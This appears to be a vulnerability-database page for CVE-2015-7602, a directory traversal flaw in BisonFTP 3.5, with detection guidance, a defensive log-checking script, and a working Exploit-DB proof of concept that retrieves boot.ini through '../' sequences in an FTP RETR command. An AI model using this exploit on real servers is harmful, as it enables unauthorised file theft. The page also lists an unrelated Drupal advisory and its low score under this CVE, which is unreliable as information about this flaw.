CVE-2015-7602
Published 2015-09-29
Directory traversal vulnerability in BisonWare BisonFTP 3.5 allows remote attackers to read arbitrary files via a ../ (dot dot slash) in a RETR command.
Priority: P265 · high · CVSS 2.0 base score 7.8
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:N/A:N
Exploit: public exploit available (see Exploit-DB and Metasploit entries below)
EPSS: 60.94% (99.0th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bisonware | bisonftp | — | — |
Detection & IOCs (extracted from sources)
- Detect FTP RETR commands containing directory traversal sequences (e.g., '../', '..//.') targeting BisonFTP 3.5 servers
- Monitor FTP sessions for unauthenticated or anonymous logins followed by RETR commands with traversal strings; the PoC calls ftp.login() with no credentials before issuing the traversal RETR
- Alert on FTP RETR requests for sensitive Windows files (e.g., boot.ini) combined with path traversal sequences as an indicator of active exploitation
- The vulnerability is specific to BisonWare BisonFTP Server version 3.5 only; other versions are not confirmed affected
- The PoC exploit was tested exclusively on Windows XP Service Pack 3 (English); traversal path depth and target file paths may differ on other Windows versions
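As an added example (not from any of this page's sources), the detection guidance above turned into a small Python checker: it parses constructed FTP command-log lines, flags RETR arguments that carry a traversal sequence, and raises severity when the same session logged in anonymously or the target is a sensitive Windows file. The log-line layout, the percent-encoded traversal forms and the win.ini entry are assumptions.

```python
import re
from collections import defaultdict

# Traversal fragments to flag in a RETR argument: "../" from the CVE text,
# "..//." from the Metasploit description, plus backslash and percent-encoded
# forms a Windows FTP daemon may also normalise (the latter are assumptions).
TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\|\.\.//\.|%2e%2e(?:/|\\|%2f|%5c)", re.IGNORECASE)
# boot.ini is the file the guidance names; win.ini is a constructed extra.
SENSITIVE_FILES = {"boot.ini", "win.ini"}

# Constructed sample log; assumed layout: "<timestamp> <client_ip> <session> <COMMAND> <argument>".
SAMPLE_LOG = """\
2015-09-29T10:00:01 203.0.113.5 s1 USER anonymous
2015-09-29T10:00:01 203.0.113.5 s1 PASS guest@
2015-09-29T10:00:02 203.0.113.5 s1 RETR ../../../boot.ini
2015-09-29T10:00:05 198.51.100.7 s2 USER alice
2015-09-29T10:00:05 198.51.100.7 s2 PASS ********
2015-09-29T10:00:06 198.51.100.7 s2 RETR reports/q3.pdf
2015-09-29T10:00:09 203.0.113.9 s3 USER anonymous
2015-09-29T10:00:10 203.0.113.9 s3 RETR ..//.//..//.//windows/win.ini
"""

def parse_line(line):
    """Split one log line into fields; the argument may be empty (e.g. a bare LIST)."""
    parts = line.split(" ", 4)
    if len(parts) < 4:
        return None
    ts, ip, session, cmd = parts[:4]
    return {"ts": ts, "ip": ip, "session": session, "cmd": cmd.upper(),
            "arg": parts[4] if len(parts) == 5 else ""}

def detect_traversal(log_text):
    """Return one alert per RETR whose argument carries a traversal sequence."""
    anonymous = defaultdict(bool)   # session id -> logged in as anonymous/ftp
    alerts = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        if rec["cmd"] == "USER" and rec["arg"].lower() in ("anonymous", "ftp"):
            anonymous[rec["session"]] = True
        if rec["cmd"] == "RETR" and TRAVERSAL_RE.search(rec["arg"]):
            target = re.split(r"[/\\]", rec["arg"])[-1].lower()   # final path component
            anon = anonymous[rec["session"]]
            sensitive = target in SENSITIVE_FILES
            alerts.append({"ts": rec["ts"], "ip": rec["ip"], "session": rec["session"],
                           "path": rec["arg"], "anonymous": anon, "sensitive": sensitive,
                           "severity": "high" if (anon or sensitive) else "medium"})
    return alerts
```

Run against SAMPLE_LOG it yields two alerts (sessions s1 and s3), both high because each combines an anonymous login with a traversal RETR for a sensitive file; the legitimate RETR in session s2 is not flagged.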
CVSS provenance
- NVD: CVSS v2.0 7.8 HIGH (AV:N/AC:L/Au:N/C:C/I:N/A:N)
- OSV: 3.5 LOW
GHSA
GHSA-872p-8wgh-9j64: Directory traversal vulnerability in BisonWare BisonFTP 3
ghsa_unreviewed · 2022-05-17 · CVE-2015-7602 [HIGH] · CWE-22
Directory traversal vulnerability in BisonWare BisonFTP 3.5 allows remote attackers to read arbitrary files via a ../ (dot dot slash) in a RETR command.
OSV
drupal7 vulnerabilities (CVE-2018-7600)
osv · 2021-03-15 · CVSS 3.5
It was discovered that Drupal did not properly process certain input. An attacker could use this vulnerability to execute arbitrary code or completely compromise a Drupal site. (CVE-2018-7600, CVE-2018-7602)
It was discovered that password reset URLs in Drupal could be forged. An attacker could use this vulnerability to gain access to another user's account. This issue affected only Ubuntu 14.04 ESM. (CVE-2015-2559)
It was discovered that Drupal did not properly protect against open redirects. An attacker could use this vulnerability to send unsuspecting users to 3rd party sites and potentially carry out phishing attacks. This issue affected only Ubuntu 14.04 ESM. (CVE-2015-2749, CVE-2015-2750)
No detection rules found.
Exploit-DB
BisonWare BisonFTP Server 3.5 - Directory Traversal
exploitdb · 2015-09-28 · CVE-2015-7602
---
#!/usr/bin/python
# title: BisonWare BisonFTP server product V3.5 Directory Traversal Vulnerability
# author: Jay Turla
# tested on Windows XP Service Pack 3 - English
# software link: https://www.exploit-db.com/apps/081331edfc143738a60e029192b5986e-BisonFTPServer.rar
# description: BisonWare BisonFTP server product V3.5 is vulnerable to Directory Traversal (quick and dirty code just for PoC)
from ftplib import FTP

ftp = FTP(raw_input("Target IP: "))
ftp.login()  # anonymous login; the server asks for no credentials
# the ../ sequences in the RETR argument escape the FTP root, so the server
# returns the Windows boot.ini instead of a file from the share
out = open('boot.ini.txt', 'wb')
ftp.retrbinary('RETR ../../../boot.ini', out.write)
out.close()  # flush the download before reading the file back
ftp.close()
file = open('boot.ini.txt', 'r')
print "[**] Printing what's inside boot.ini\n"
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
print file.read()
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
file.close()
Metasploit
BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure
metasploit
This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'.
No writeups or analysis indexed.
Published: 2015-09-29